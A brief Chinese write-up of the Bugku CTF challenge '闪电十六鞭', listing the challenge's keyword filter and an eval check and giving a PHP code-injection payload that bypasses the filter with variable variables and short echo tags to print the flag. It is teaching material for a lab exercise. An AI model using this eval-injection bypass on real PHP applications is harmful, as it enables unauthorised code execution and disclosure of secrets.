==============================简化源码==============================
1、strlen($_GET['flag']) != strlen($exam) flag变量长度为49
2、flag过滤了 '/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is'
3、(eval($_GET['flag']) === sha1($flag))
原理
eval(<?php echo $flag;?>)
payload
?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111
分析
<?php echo $flag;?> --》》 <?=$flag;?> --》》 $a=flag --》》 <?=$$a;?> --》》$a='fla1';$a{3}='g';
[bugku]-闪电十六鞭
最新推荐文章于 2024-03-31 20:22:27 发布